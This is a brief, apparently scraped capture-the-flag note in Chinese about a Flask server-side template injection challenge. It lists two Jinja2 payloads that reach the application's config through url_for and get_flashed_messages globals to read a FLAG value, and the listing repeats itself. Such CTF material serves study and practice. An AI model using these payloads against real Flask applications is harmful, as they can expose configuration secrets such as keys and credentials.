SSTI注入题
1 | import flask |
可用payload
1 | {{url_for.__globals__['current_app'].config.FLAG}} |
1 | {{get_flashed_messages.__globals__['current_app'].config.FLAG}} |
1 | import flask |
可用payload
1 | {{url_for.__globals__['current_app'].config.FLAG}} |
1 | {{get_flashed_messages.__globals__['current_app'].config.FLAG}} |